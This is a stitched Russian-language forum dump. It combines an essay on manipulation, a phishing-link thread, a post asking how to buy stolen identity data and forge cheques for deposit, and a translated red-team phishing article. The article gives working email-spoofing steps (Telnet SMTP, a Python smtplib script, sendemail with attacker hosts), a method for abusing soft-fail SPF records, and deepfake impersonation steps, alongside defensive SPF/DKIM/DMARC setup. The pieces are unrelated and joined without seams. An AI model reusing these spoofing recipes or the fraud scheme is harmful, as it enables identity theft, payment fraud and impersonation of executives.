манипулировать друг другом, и делает это с успехом с самого рождения.
Манипуляция становиться злом, когда человек не берет на себя ответственность
за совершенные им действия.
Из этих тезисов логично вытекает главный, к которому я и веду:
Вы можете делать все что угодно, при условии, что вы берете на себя ответственность за свои действия.
Понимаю, что фраза "все что угодно" может вызвать некоторое не согласие: "Постойте-ка, а как же мораль? А как же общественные ценности?" Мне понятно это несогласие, и все же я настаиваю на личной ответственности взамен общественнх ценностей. Дело в том, что мы с вами живем в весьма фрагментированом обществе (к тому же еще и поделенном на социальные классы), где тесно соседствует множество разных культур, пропагандирующих совершенно разные, а иногда и прямо противоположные ценности. И если ценности высокго порядка (первые три-четыре) у нас могут более или менее совпадать, то все остальные будут уже сильно различаться, причем даже у людей из одного общества. Просто потому что каждый из нас принадлежит к нескольким обществам сразу и имеет свою систему ценностей. И не наступить на "общественные" ценности человека, стремясь к своим "общественным" ценностям, практически невозможно. (На этих граблях, кстати, и висит большая часть неразрешенных конфликтов общественного характера.) Поэтому, мораль, построенная на ценностях в нашем культурно фрагментированном обществе просто не работает - тонны горького опыта тому доказательство. И поэтому я говорю о личной ответственности.
И тут возникает один замечательный вопрос. А что если я не буду брать на себя ответственность за свои действия, и буду делать все что хочу? Или аналогичный ему: "Да фиг с ней с ответственностью, кто узнает? Кто спросит? Кто?!... Да я его тогда...!".
И вот тут мы подходим к главному, что необходимо понимать в вопросе манипуляции.
Системные эффекты
То, что любое действие будет иметь последствия (вопрос, какие?), понимают все. А вот то, что это правило относится к каждому нашему действию, к сожалению, люди не всегда помнят.
А бывает так: поблагодарил коллегу за случайный комплимент, ему стало приятно,
и он обмолвился в разговоре в курилке, что вы "свой парень" и ненроком поднял
ваш "рейтинг". А когда стали решать всем отделом, кого из передовиков путевкой
поощрить, за тебя вдруг проголосовало больше.
Или не поблагодарил коллегу за тот же комплимент, и там где тебя должно было
ждать "везение", его просто не случилось.
Точно так вы можете где-то с кем-то согласиться просто из вежливости и
уважения к чужой точке зрения, и потом он согласиться с вами, когда вы будете
шефу презентовать свой новый проект.
В НЛП такие "последствия" называются - системные эффекты (когда взаимодействие людей рассматривается, как взаимодействие элементов одной системы). Просчитать их полностью не возможно, но предугадать очевидные или предположить тенденции
Но это еще не все. Информация имеет тенденцию накапливаться в сознании людей и
в "общественных архивах", вроде форумов, писем, публикаций и т.д. И
скопившись, она становиться самоподдерживающейся. Знакомая ситуация: "Да разве
ж он мог такое сказать?! Я его давно знаю! Это не в его стиле."? Сложившаяся
репутация заставляет людей верить в то, к чему они привыкли и будет
поддерживать эту веру. Такова природа человеческого мышления.
Как говорил Михайл Романович Гинзбург (большой специалист и мой учитель по
Эриксоновскому гипнозу): "Сначала вы работаете на зачетку, а потом зачетка
работает на вас".
Таким образом, выходит, что системные эффекты наших сегодняшних дел могут вернуться к нам сегодня же, а могут где-то накопиться и аукнуться лет через пять. И если мы хотим получить какой-либо эффект как можно быстрее, нужно просто быстрее и больше "нароботать" "зачетку". И наоборот, если мы не хотим получать этот эффект.
Однако стоит помнить, что от одного действия системных эффектов может быть несколько. И, создавая одни эффекты, "в нагрузку" мы можем получить еще и другие. Так, выслуживание перед начальством может принести вместе с расположением шефа и отдаление коллег. Имидж успешного работника - вместе с предпочтением руководства, завиcть менее успешных но не менее амбициозных сослуживцев. Изобильное внимание к клиенту вместе с его расположением и повышенные требования к обслуживанию, а то и к цене.
Поэтому, чтобы учитывать максимум возможных эффектов, стоит делать две вещи:
Вставать на позицию человека (группы), к которому обращена коммуникация, и из
его позиции смотреть, устроит ли его эта коммуникация в это время, в этом
месте и в этой ситуации?
Вставать на позиции всех остальных участников коммуникации, и смотреть, все ли
устроит их в этой ситуации?
Но ведь, возникает вопрос, сделать так, чтобы не вызвать негативных эффектов, во многих случаях просто невозможно? Например, как только ты становишься богатым, десятки людей начинают тебе завидовать. Или, если у тебя есть конкуренты в бизнесе, то привлекая рекламой клиента к себе, ты лишаешь его конкурента. Разве не так?
Да. Так. И здесь самое время вспомнить о разделении ответственности. Одно дело, чье-то недовольство по поводу твоего успеха, и другое - чье-то недовольство в следствие твоего успеха.
Иными словами, если ваш успех достигается за счет того, что кто-то что-то теряет, не получая ничего достойного взамен - это не успех, а кража. (Не покупайте рыбу у Василия, она у него костлявее, чем у меня. )
А если вы достигаете успеха при равноценном обмене (на который согласились бы сами), тогда это честный успех. (Если вы купите рыбу у меня, то я вам, как своему клиенту, дам уникальный рецепт таежной ухи, доставшийся мне по наследству от дедушки - большого специалиста по рыбе. ) Или, раз уж мы говорим о манипуляции - честная манипуляция.
Но как это связано с системными эффектами? Очень просто. Помните закон
сообщающихся сосудов? Чтобы из одного сосуда вода перешла в другой, нужно,
помимо прочего, еще и чтобы из другого сосуда часть воздуха перешла в первый.
Иначе разница в давлени просто не пустит воду.
(Нет, с усилием, конечно можно сделать все, но представьте, какую это зарядит
"пружину"! И как она потом "выстрелит"!
)
Так вот, это так же и один из законов системной к коммуникации. В общении невозможно что-то получить, не отдав ничего взамен, и, как ни странно, невозможно ничего отдать, не получив ничего за это Вопрос лишь в том - что?
Стратегия "выигрыш-выигрыш"
Зачем заставлять человека что-то делать, когда можно просто вызвать у него желание к этому? Понятно, что заставить проще, но ведь при этом и намного дороже. Может быть не сразу, но в так в будущем. (Если не понятно, почему дороже, перечитайте предыдущие два абзаца )
Впрочем, когда у человека в руках пистолет, а на шее петля, и таймер отсчитывает оставшееся ему время, я могу понять его попытки заставить кого-то что-то сделать. Но если это просто семейный разговор, или обычная рабочая ситуация?
В любых отношения всегда существует внегласный контракт. (А то и гласный.
)
И если один человек согласился сделать что-то для другого, то он сам от этого
что-то получает.
И, скажу сразу, бескорыстности тут не бывает, потому что сама идея "быть
бескорыстным" уже корыстна.
А если кто-то что-то делает другому "за так", то ему самому либо прикольно это
делать, либо полезно, либо он это делает все-таки не совсем "за так"
И, здесь совершенно справедливо, что многие люди (и я в том числе) получают
искреннее удовольствие делая другим подарки. Казалось, что бескорыстнее?
Так вот, стратегия "выигрыш-выигрыш" заключается в том, что мы не заставляем
человека думать, какие выгоды он получит, от того что сделает то, что нам
нужно, а просчитываем его выгоды сами и просто предлагаем их ему вместе с
просьбой или "контрактом". Знакомые примеры: "ты гулять пойдешь, как сделаешь
уроки, или сейчас? Сейчас? Возьми тогда собаку, пожалуйста."?
Или: "Пиво с креветками хочешь? Я дам денег, сходи пожалуйста."
Примерно по той же схеме работает популярная во многих компаниях стратегия
"проталкивания" своего проекта: "Шеф, вы на той неделе классную идею подали! Я
нашел способ ее реализовать..."
В бизнесе стратегия "выигрыш-выигрыш" - это чистая продажа. Любой мало- мальски грамотный продавец знает, что люди покупают не товар, а выгоды, которые он им принесет. Поэтому классическая схема продаж начинается с выявления потребностей клиента, или определения контекста использования товара, что тоже самое.
Как видите, "выигрыш-выигрыш", это тоже манипуляция. Причем, порой, в особо крупных масштабах Но, манипуляция, надо заметить честная. И я не буду вас спрашивать, почему
(С) Егор Булыгин, тренер НЛП
Western Union > WebMoney; произвольные банковские реквизиты
MoneyGram > WebMoney; произвольные банковские реквизиты
подробнее -- http://www.tabulaonline.ru/
Предлагаю выкладывать известные вам адреса фишинг страниц ....
начну :
не стану все копировать
http://www.fraudwatchinternational.com/phishing/index.php
здесь дата обнаружения страницы, ее краткое описание и зеркало
Для новости наверное старовато Дата: 28.09.2004
зато по теме раздела, и все еще актуально
Специалисты британской консалтинговой фирмы Next Generation Security (NGS) в рамках исследования, проведенного фирмой, опубликовали отчёт под названием «Руководство по фишингу. Понимание и предотвращение фишинговых атак» («The Phishing Guide. Understanding & Preventing Phishing Attacks»), который и выложили в Интернете в PDF-формате. В профессиональном «Руководстве» компаниям даются практические советы, как не стать жертвами фишинга. Здесь описываются типичные методы, которые используются злоумышленниками, а также типичные дыры в системах безопасности. Приводятся рекомендации, как улучшить безопасность всей системы на стороне клиента, на серверной стороне, а также на уровне всего предприятия. Документ, составлен независимыми экспертами, и в нем не содержится рекламы конкретных программных продуктов. Советы по безопасности носят академический, системный характер, но при этом предельно конкретны. Специалисты NGS подчеркивают, что большинство «дыр» в безопасности веб-сайтов можно легко устранить сразу же после их обнаружения. «Финансовые организации тратят огромные деньги на безопасность, — говорит Гунтер Оллман (Gunter Ollman), директор по профессинальным сервисам NGS. — Но, когда вы посмотрите на сайт обычного интернет-магазина, то ситуация намного хуже».
Click to expand...
PDF на Eng языке 1,7 метра
http://www.ngssoftware.com/papers/NISR-WP-Phishing.pdf
дает представления об основных методах фишинга
возможно ничего революционного , но довольно познавательно
Приветствую, как видел в чатах американцев, которые всё время продают данные чеки, а некоторые их покупают. Принцип скорее всего правильно понял, но не не уверен, так ли это работает покупаю холдера в плане все его данные, как пример: дл, кр, гб, кс, ссн+доб и т.д, после регаю приёмку (банк), как пример бофа биз, покупаю чек пустой, после рисую на имя холдера, а потом фоткаю с телефона, ведь так?. Такой вопрос ещё, когда отрисовываю, я же не могу нарисовать в чеке 100000$, так как это в целом на мой взгляд невозможно, если есть знающие люди, то пожалуйста отпишите в пм
Источник : https://redteamrecipe.com/top-phishing-techniques
Перевёл : BLUA специально для xss.is
Фишинг в рамках RedTeam включает в себя симуляцию реалистичных атак, которые используют человеческие уязвимости для получения несанкционированного доступа к системам или конфиденциальной информации. Эти методы могут включать целевой фишинг (spear-phishing), когда высоко специализированные электронные письма отправляются конкретным лицам с целью обмануть их, заставив нажать на вредоносные ссылки или раскрыть учетные данные, или так называемый "whaling", который сосредоточен на высокопрофильных целях, таких как руководители. Нападающие также могут использовать голосовой фишинг (vishing) или SMS-фишинг (smishing), чтобы заманить жертв к раскрытию информации. Участники красной команды создают убедительные сценарии, чтобы проверить способность организации обнаруживать и реагировать на эти техники социального инжиниринга.
Синяя команда, отвечающая за защиту, использует многослойный подход для противодействия фишинговым атакам. Это включает в себя обучение сотрудников распознаванию подозрительных электронных писем и сообщений, а также внедрение систем фильтрации электронной почты и технологий противодействия фишингу для блокировки вредоносного контента до его поступления к пользователям. Синие команды также мониторят сетевой трафик на предмет индикаторов компрометации (IoC), таких как аномальные попытки входа или необычные передачи данных. Разрабатываются планы реагирования на инциденты, чтобы смягчить последствия в случае успешных фишинговых атак, обеспечивая быстрое сдерживание, восстановление и анализ для укрепления будущих защитных мер.
Человеческий интеллект
Человеческий интеллект (HUMINT) и социальная инженерия в фишинге в значительной степени полагаются на манипуляцию человеческими эмоциями и поведением, чтобы обмануть людей и заставить их поделиться конфиденциальной информацией. Фишеры используют HUMINT для сбора личных данных, таких как должности, интересы и связи, что позволяет им создавать целенаправленные атаки. Социальная инженерия усиливает эти атаки, используя эмоциональные триггеры, такие как страх, срочность, доверие и жадность. Эти методы манипулируют людьми, заставляя их принимать импульсивные решения, такие как нажатие на вредоносную ссылку или предоставление учетных данных, убеждая их в том, что запрос является законным или срочным.
Человеческий интеллект (HUMINT) и социальная инженерия в фишинге в значительной степени основываются на манипуляции человеческими эмоциями и поведением, чтобы обмануть людей и заставить их поделиться конфиденциальной информацией. Фишеры используют HUMINT для сбора личных данных, таких как должности, интересы и связи, что позволяет им создавать целенаправленные атаки. Социальная инженерия усиливает эти атаки, используя эмоциональные триггеры, такие как страх, срочность, доверие и жадность. Эти методы манипулируют людьми, заставляя их принимать импульсивные решения, такие как нажатие на вредоносную ссылку или предоставление учетных данных, убеждая их в том, что запрос является законным или срочным.
Лицевые эмоции и их распознавание играют ключевую роль как для атакующих, так и для защитников в сценариях социальной инженерии. Фишеры могут наблюдать за такими эмоциями, как страх, замешательство или облегчение, чтобы адаптировать свой подход, делая свою историю более правдоподобной. С точки зрения защиты распознавание эмоциональных реакций может помочь синим командам обучать сотрудников останавливаться и критически оценивать подозрительные запросы. Вот шпаргалка с общими сценариями и эмоциональными триггерами, которые они эксплуатируют:
Шпаргалка: Сценарии фишинга и эмоциональные триггеры
1. Страх/Тревога
- Сценарий : «Ваш аккаунт был скомпрометирован. Сбросьте пароль
немедленно!»
- Эмоциональный сигнал : Страх потерять доступ или подвергнуть риску
раскрытия личных данных.
- Ответ : Жертва испугалась и кликнула на вредоносную ссылку, не проверив
источник.
2. Любопытство
- Сценарий : "Вы получили конфиденциальный документ. Откройте, чтобы
просмотреть."
- Эмоциональный сигнал : Интерес, вызванный загадкой или эксклюзивностью.
- Ответ : Жертва открывает вложение, которое устанавливает вредоносное
ПО.
3. Срочность
- Сценарий : "Завершите этот платеж сейчас, чтобы избежать штрафов за
просрочку."
- Эмоциональный сигнал : Давление действовать быстро, не тратя время на
проверку.
- Ответ : Жертва спешит и вводит данные платежа на фишинговом сайте.
4. Доверие/Авторитет
- Сценарий : "Это твой начальник. Мне нужно, чтобы ты немедленно перевел
средства на этот счет."
- Эмоциональный сигнал : Уважение к власти, страх перед неповиновением.
- Ответ : Жертва, полагая, что запрос исходит от их начальника, выполняет
его без вопросов о легитимности.
5. Жадность/Восторг
- Сценарий : "Вы выиграли подарочную карту на $1,000! Нажмите, чтобы
получить свой приз."
- Эмоциональный сигнал : Желание получить вознаграждение или финансовую
выгоду.
- Ответ : Жертва предоставляет личную информацию, чтобы получить
поддельный приз.
Недостаток SPF
Emkei.cz — это онлайн-инструмент, который позволяет пользователям отправлять поддельные электронные письма, просто заполнив форму. Этот инструмент может быть использован в мошеннических целях для фишинга и социальных атак, поскольку он позволяет отправителю подделывать адрес "От кого", создавая видимость, что письмо приходит от легитимного или надежного источника. Понимание того, как злоумышленники используют такие инструменты, как Emkei.cz, может помочь в разработке эффективных мер предосторожности.
Как работает Emkei.cz для отправки поддельных писем
Использование Emkei.cz для отправки поддельного письма включает в себя заполнение нескольких полей и нажатие кнопки "Отправить". Вот пошаговая инструкция:
1. Доступ к веб-сайту:
- Перейдите на emkei.cz в вашем браузере.
2. Заполнение формы:
- От : Вы вводите поддельный адрес электронной почты отправителя,
например ceo@legitcompany.com
- Кому : Укажите адрес электронной почты жертвы, например
victim@targetdomain.com
- Тема : Вы можете написать любую тему, например, Срочно: требуется оплата
- Сообщение : Составьте содержание электронного письма, которое может
выглядеть следующим образом:
Code:Copy to clipboard
Dear John,
Please make the payment of $5,000 to the attached account. This is urgent.
Regards,
CEO
1. SMTP параметры : Вы можете использовать настройки по умолчанию или
настроить собственный SMTP при необходимости. Пользовательский SMTP помогает
дополнительно скрыть источник.
2. Вложение : По желанию вы можете прикрепить файлы (которые могут
содержать вредоносное ПО или другие злонамеренные компоненты).
3. Отправка электронной почты : После заполнения формы нажмите кнопку
"Отправить письмо", и поддельное письмо будет отправлено жертве.
Простота этого процесса делает Emkei.cz привлекательным для злоумышленников. Он не требует технических навыков, а отправленные письма могут выглядеть убедительно реальными для жертв.
Как предотвратить отправку поддельных писем через Emkei.cz
Предотвращение поддельных писем, подобных тем, что отправляются через
Emkei.cz, требует многослойной стратегии защиты, сосредоточенной на методах
аутентификации электронной почты и мониторинге.
1. Настройте SPF (Sender Policy Framework)
SPF — это DNS-запись, которая определяет, какие почтовые серверы имеют право
отправлять электронные письма от имени вашего домена. Если она настроена
правильно, то может блокировать несанкционированные серверы (такие как серверы
Emkei.cz от отправки писем от имени вашего домена.
Чтобы добавить запись SPF:
- Добавьте это в настройки DNS вашего домена:
example.com. IN TXT "v=spf1 ip4:192.0.2.1 -all"
- ip4:192.0.2.1 : Указывает IP-адрес авторизованного почтового сервера.
- -all : Отклоняет все электронные письма, не отправленные с
авторизованных IP-адресов.
Проверьте свою SPF-запись:
Вы можете использовать онлайн-инструмент, такой как MXToolbox , или
командные инструменты для проверки вашей SPF-записи:
dig txt example.com
Убедитесь, что SPF-запись правильно настроена и включает все легитимные
почтовые серверы для вашего домена.
2. Настройте DKIM (Почта с идентификацией доменов)
DKIM добавляет криптографическую подпись в заголовки исходящих электронных писем. Если кто-то попытается отправить электронное письмо с вашего домена без этой подписи (как это делает Emkei.cz), письмо будет отмечено как подозрительное.
Шаги для настройки DKIM:
- Сгенерируйте пару ключей DKIM (публичный и приватный).
- Опубликуйте публичный ключ в виде DNS TXT-записи для вашего домена.
- Настройте ваш почтовый сервер на подпись исходящих писем с помощью
приватного ключа.
Пример DKIM DNS записи:
Code:Copy to clipboard
default._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=your_public_key"
Используйте командную строку для проверки DKIM записи:
Code:Copy to clipboard
dig txt default._domainkey.example.com
Убедитесь, что ваша настройка DKIM работает правильно, протестировав её с помощью таких инструментов, как dmarcian.com.
3. Настройте DMARC (Аутентификация сообщений на основе домена, отчетность и соответствие)
DMARC позволяет владельцам доменов указывать, как принимающие серверы должны обрабатывать неудачные проверки SPF и DKIM (например, отклонять или помещать в карантин).
Шаги для настройки DMARC:
- Добавьте следующую DNS TXT запись:
Code:Copy to clipboard
_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; ruf=mailto:forensic-reports@example.com"
Эта запись означает:
- p=reject : Электронные письма, не прошедшие проверку DMARC, будут
отклонены.
- rua : Сводные отчеты будут отправлены на dmarc-reports@example.com
- ruf : Судебные отчеты будут отправлены на forensic- reports@example.com
Проверьте свою запись DMARC с помощью командных инструментов:
Code:Copy to clipboard
dig txt _dmarc.example.com
Это гарантирует, что ваша политика DMARC правильно опубликована и распознана принимающими почтовыми серверами.
4. Используйте фильтры электронной почты и решения для обеспечения безопасности
Решения для фильтрации электронной почты могут автоматически блокировать или помещать в карантин подозрительные письма, включая те, которые отправлены через Emkei.cz.
- Используйте шлюзы безопасности электронной почты: решения, такие как
Proofpoint, Mimecast или Microsoft Defender для Office 365, могут обнаруживать
и блокировать поддельные письма на основе поведенческих паттернов и аномалий.
- Включите фильтры против спуфинга: большинство корпоративных почтовых систем
(таких как Google Workspace или Microsoft Exchange) позволяют включить
обнаружение и фильтрацию спуфинга по умолчанию.
5. Мониторинг и анализ журналов
Сервера электронной почты и средства безопасности генерируют журналы, которые могут выявить подозрительную активность в электронной почте, такую как письма, не прошедшие проверки SPF, DKIM или DMARC. Регулярно просматривайте эти журналы на наличие признаков попыток спуфинга.
Например, на серверах электронной почты Postfix проверьте журнал на наличие отклоненных писем:
Code:Copy to clipboard
grep "reject" /var/log/mail.log
Это покажет письма, которые были заблокированы из-за неудачных проверок SPF, DKIM или DMARC.
Пример команды для применения SPF, DKIM и DMARC на сервере Postfix:
1. Принудительное выполнение проверок SPF в Postfix:
Добавьте следующее в ваш файл /etc/postfix/main.cf
:
Code:Copy to clipboard
smtpd_recipient_restrictions =
reject_unauth_destination
check_policy_service unix:private/policyd-spf
2. Установите и настройте DKIM с помощью OpenDKIM:
Установите OpenDKIM:
Code:Copy to clipboard
sudo apt-get install opendkim opendkim-tools
Настройте Postfix для использования OpenDKIM, отредактировав
/etc/postfix/main.cf
:
Code:Copy to clipboard
milter_default_action = accept
milter_protocol = 2
smtpd_milters = unix:/opendkim/opendkim.sock
non_smtpd_milters = unix:/opendkim/opendkim.sock
3. Включите DMARC в Postfix:
Установите и настройте сервис политики DMARC, такой как OpenDMARC, и настройте
его с Postfix аналогично OpenDKIM.
Обойти SPF
SPF (Sender Policy Framework) — это механизм аутентификации электронной почты, который помогает предотвратить отправку спама от имени вашего домена. SPF работает, позволяя владельцам доменов указывать, какие почтовые серверы имеют право отправлять электронные письма от имени их домена. Когда почтовый сервер получает сообщение, он проверяет SPF-запись отправляющего домена, чтобы подтвердить, что IP-адрес отправителя имеет право отправлять электронные письма для этого домена. Если проверка SPF не проходит, принимающий сервер может пометить сообщение как спам или полностью отклонить его.
1. Создание DNS-записи: Владелец домена публикует SPF-запись в DNS
(Системе доменных имен). Эта запись содержит список всех авторизованных
почтовых серверов для данного домена.
Пример SPF-записи:
Code:Copy to clipboard
v=spf1 ip4:192.168.1.1 include:example.com -all
- Эта запись позволяет IP-адресу 192.168.1.1
и example.com
отправлять
электронные письма для данного домена. Указание -all
означает, что любые
другие IP-адреса должны не проходить проверку SPF.
2. Проверка сервера получения: Когда электронное письмо получено, сервер получателя проверяет DNS-записи отправляющего домена. Если IP-адрес отправляющего сервера соответствует авторизованному списку, проверка SPF проходит успешно.
Несмотря на защиту SPF, подделка остается проблемой, особенно если домены не применяют SPF или если сервер получателя не настроен на отклонение неудачных проверок SPF.
Подделка почтового сервера включает в себя отправку электронного письма, которое выглядит так, будто оно пришло с домена или адреса электронной почты другого человека. Обычно это делается для фишинга или атак социальной инженерии. Хотя SPF может предотвратить доставку поддельных писем, злоумышленники все равно могут попытаться подделать электронные письма, обойдя SPF на плохо сконфигурированных системах или нацеливаясь на системы, в которых отсутствуют надлежащие протоколы аутентификации электронной почты.
Инструменты для подделки электронной почты
Вот упрощённое руководство о том, как можно отправить поддельное электронное письмо с помощью Telnet или инструментов, таких как Sendmail, или библиотек SMTP в Python. Эти методы предназначены только для образовательных целей.
Использование Telnet для подделки электронных писем
Telnet можно использовать для прямого общения с сервером SMTP (Simple Mail Transfer Protocol) и отправки электронных писем. Вот как это работает:
Шаги:
Откройте терминал и используйте Telnet для подключения к почтовому серверу:
Code:Copy to clipboard
telnet smtp.example.com 25
Сервер ответит. Теперь скажите "привет" почтовому серверу с помощью команды SMTP:
Code:Copy to clipboard
HELO example.com
Установите фейковый адрес отправителя:
Code:Copy to clipboard
MAIL FROM: <fake@example.com>
Установите адрес получателя:
Code:Copy to clipboard
RCPT TO: <victim@targetdomain.com>
Начните составление сообщения:
Code:Copy to clipboard
DATA
Напишите текст письма и заголовки:
Code:Copy to clipboard
Subject: Important Update
From: CEO <ceo@company.com>
To: victim@targetdomain.com
Hello,
This is a fake email. Please follow the instructions below...
.
Завершите сообщение точкой .
на новой строке, чтобы отправить:
Code:Copy to clipboard
.
Завершите сеанс:
Code:Copy to clipboard
QUIT
Электронное письмо теперь будет отправлено получателю, возможно, обходя слабые меры безопасности электронной почты.
Использование Python для подделки электронных писем
Библиотеку smtplib в Python можно использовать для написания скриптов отправки электронных писем, включая поддельные сообщения.
Пример:
Code:Copy to clipboard
import smtplib
# Set up the server
server = smtplib.SMTP('smtp.example.com', 25) # Replace with the target SMTP server and port
server.ehlo()
# Compose the message
from_email = "ceo@company.com" # Spoofed sender
to_email = "victim@targetdomain.com"
subject = "Urgent: Security Update"
message = """\
From: CEO <ceo@company.com>
To: <victim@targetdomain.com>
Subject: {subject}
Dear User,
Please reset your password immediately at the following link:
http://malicious-link.com
Sincerely,
CEO
"""
# Send the email
server.sendmail(from_email, to_email, message)
server.quit()
Как защититься от подделки электронной почты
Чтобы защититься от поддельных электронных писем, организациям следует
внедрить и соблюдать следующие механизмы:
1. SPF : Убедитесь, что записи SPF правильно настроены для домена.
2. DKIM (DomainKeys Identified Mail) : Подписывайте исходящие электронные
письма цифровой подписью.
3. DMARC (Domain-based Message Authentication, Reporting, and
Conformance) : Установите политики, которые указывают принимающим почтовым
серверам, как обрабатывать электронные письма, не прошедшие проверки SPF или
DKIM.
4. Фильтрация электронной почты : Используйте продвинутые инструменты
фильтрации электронной почты для обнаружения и блокировки подозрительных
писем, даже если проверки SPF и DKIM проходят.
5. Обучение сотрудников : Обучите сотрудников распознавать фишинговые
письма и понимать риски подделки электронной почты.
Несоответствие Return-Path
Одной из самых распространённых техник фишинга является подделка адреса электронной почты отправителя, чтобы создать видимость, что письмо пришло от надежного источника. Быстрый способ выявить это — сравнить поле "Отправитель" с полем "Return-Path" в заголовке письма. Нападающий подделывает поле "От", но фактический сервер, отправляющий письмо, может быть другим, что выдаёт атаку.
Шаги для проверки отправителя и Return-Path:
1. Откройте электронное письмо.
2. Нажмите на три точки⋮
в правом верхнем углу письма и выберите "
Показать оригинал" (в таких сервисах, как Gmail).
3. Проверьте поле отправителя в теле письма и поле Return-Path
в
оригинальных заголовках.
4. Если поле отправителя (видимое в письме) и поле Return-Path (в
оригинальном источнике) не совпадают, это с высокой вероятностью является
попыткой фишинга.
Сценарий атаки - Код для отправки поддельного письма с подмененным полем Return-Path:
Атакующий может использовать инструменты, такие как Sendmail или SendEmail , чтобы подменить адрес "От" в электронном письме, установив при этом другой Return-Path.
Code:Copy to clipboard
sendemail -f attacker@fakecompany.com -t victim@legitcompany.com -u "Urgent: Payment Required" \
-m "Please process the payment today." \
-s smtp.fakeserver.com:25 -o message-header="Return-Path: <attackerserver@malicious.com>"
В этом примере атакующий устанавливает Return-Path на другой сервер. При нажатии на "Показать оригинал" получатель может обнаружить это несоответствие и определить его как мошенническое.
Проверка IP-адреса почтового сервера
Атакующие часто используют скомпрометированные или несанкционированные почтовые серверы для отправки фишинговых писем. Проверка IP-адреса сервера, отправляющего электронное письмо, может показать, является ли этот сервер доверенным. Инструменты, такие как MXToolbox, могут помочь определить, находится ли отправляющий IP-адрес в черном списке, что может сигнализировать о потенциальном мошенничестве.
Шаги для проверки IP-адреса:
1. Откройте оригинальный источник письма (выберите "Показать оригинал" в
Gmail).
2. Найдите IP-адрес отправителя , просмотрев заголовки "Received".
Например:
Code:Copy to clipboard
Received: from smtp.maliciousserver.com ([192.0.2.123])
3. Используйте MXToolbox или другой сервис для проверки, находится ли IP-
адрес отправителя в черном списке:
- Перейдите на MXToolbox и введите IP-адрес.
4. Если IP-адрес находится в черном списке или вызывает подозрения, вероятно,
это попытка фишинга.
Сценарий атаки - Отправка поддельного письма с помощью собственного SMTP:
Нападающий может использовать собственный SMTP-сервер для отправки поддельного письма:
Code:Copy to clipboard
sendemail -f ceo@legitcompany.com -t victim@target.com \
-u "Invoice Payment Required" -m "Please pay the invoice attached." \
-s smtp.maliciousserver.com:25
В этом случае IP-адрес smtp.maliciousserver.com
можно проверить по черному
списку, чтобы выявить его злонамеренные намерения.
Если SPF или DMARC не проходят проверку, письмо может быть подделано.
Сценарий атаки - Обход SPF и отправка фишинговых писем:
SPF можно обойти, если SPF-запись целевого домена неправильно настроена,
например, используется мягкий отказ ~all
вместо жесткого отказа -all
. Вот
как злоумышленник может попытаться это сделать:
1. SPF-запись домена:
Code:Copy to clipboard
v=spf1 ip4:192.0.2.1 ~all
- ~all
означает, что неавторизованные серверы будут помечены, но не
отклонены
- Отправить поддельное письмо с использованием неавторизованного сервера:
Code:Copy to clipboard
sendemail -f finance@legitcompany.com -t victim@targetdomain.com \
-u "Payment Information" -m "Please complete the attached invoice." \
-s smtp.attacker.com:25
Поскольку SPF установлен на мягкий отказ, письмо все равно может быть доставлено, даже если оно отправлено с неавторизованного сервера.
Методы предотвращения
Чтобы защитить вашу email-систему от фишинговых атак, крайне важно применять лучшие практики безопасности, такие как SPF, DKIM и DMARC, с правильными настройками.
Настройка SPF-записи:
Убедитесь, что ваша SPF-запись четко определяет, какие серверы могут
отправлять электронные письма от имени вашего домена:
1. Отредактируйте свои DNS, чтобы добавить SPF-запись: example.com. IN TXT "v=spf1 ip4:192.0.2.1 -all"
2. Проверьте вашу SPF-запись: Используйте инструмент, такой как MXToolbox
dig txt example.com
Настройка DKIM:
1. Сгенерировать DKIM-ключ: Используйте инструменты, такие как opendkim, для
генерации открытых и закрытых ключей opendkim-genkey -s default -d example.com
2. Добавьте открытый ключ в DNS: Добавьте открытый ключ в ваш DNS
default._domainkey.example.com . IN TXT "v=DKIM1"; k=rsa; p=MIGf...your_public_key...
3. Настройте ваш почтовый сервер для подписи электронных писем: Настройте ваш
почтовый сервер (например, Postfix) для подписи исходящих электронных писем с
помощью DKIM.
Настройка DMARC:
1. Добавьте политику DMARC в DNS: _dmarc.example.com . IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
2. Проверьте DMARC: Используйте MXToolbox, чтобы убедиться, что ваша
конфигурация DMARC активна dig txt _ dmarc.example.com
Дипфейки и голосовой фишинг
Фишинг значительно эволюционировал, включая сложные технологии, такие как deepfake и сгенерированные искусственным интеллектом поддельные голоса, чтобы обмануть и манипулировать жертвами. Эти новые методы могут сделать фишинг- атаки более убедительными, подражая доверенным лицам как в визуальном, так и в аудиоформатах. Это добавляет новый уровень сложности к традиционным методам фишинга и требует продвинутых мер противодействия.
1. Фишинг с глубокими фейками (манипуляция видео)
Фишинг с deepfake'ами включает использование видео, сгенерированных искусственным интеллектом, для выдачи себя за доверенных лиц, таких как руководители компаний или публичные фигуры. Злоумышленники могут использовать голосовые фейки в фишинг-кампаниях, чтобы манипулировать сотрудниками или другими людьми, заставляя их выполнять действия, такие как перевод средств, раскрытие конфиденциальной информации или переход по вредоносным ссылкам.
Сценарий атаки с использованием видео дипфейк
Создание видео глубокого фейка: Злоумышленники используют инструменты ИИ, такие как DeepFaceLab или FaceSwap, чтобы создать видео, в котором они выдают себя за высокопоставленного руководителя или доверенное лицо. Затем они могут составить фишинговое письмо или сообщение с встроенным видео глубокого фейка, в котором просят жертву предпринять срочные действия.
- Установите DeepFaceLab и загрузите предварительно обученные модели:
Code:Copy to clipboard
git clone https://github.com/iperov/DeepFaceLab.git
cd DeepFaceLab
- Соберите видеоданные человека, которого необходимо изобразить (исходное видео), и видео актера (целевое видео).
- Извлеките лица из исходного видео:
Code:Copy to clipboard
python main.py extract --input-dir path/to/source_video --output-dir path/to/faces
- Обучите модель для создания дипфейка:
Code:Copy to clipboard
python main.py train --data-dir path/to/dataset
- Сгенерируйте видео с дипфейком:
Code:Copy to clipboard
python main.py merge --input-dir path/to/trained_model --output-dir path/to/output_video
Фишинг с использованием искусственно сгенерированного голоса
Сгенерированные искусственным интеллектом фальшивые голоса, часто называемые голосовыми дипфейками или вишингом (голосовой фишинг), могут использоваться для выдачи себя за доверенных лиц по телефону или в голосовых сообщениях. Злоумышленники могут синтезировать голос человека с помощью алгоритмов машинного обучения, что делает фишинговые атаки более убедительными.
Сценарий атаки с использованием фальшивого голоса
- Создание фальшивого голоса с помощью ИИ: такие инструменты, как Descript
или Lyrebird, могут использоваться для создания голосового дипфейка, обучая ИИ
на образце голоса цели.
- Запишите или соберите образец голоса цели (например, из публичных
выступлений, видео или подкастов).
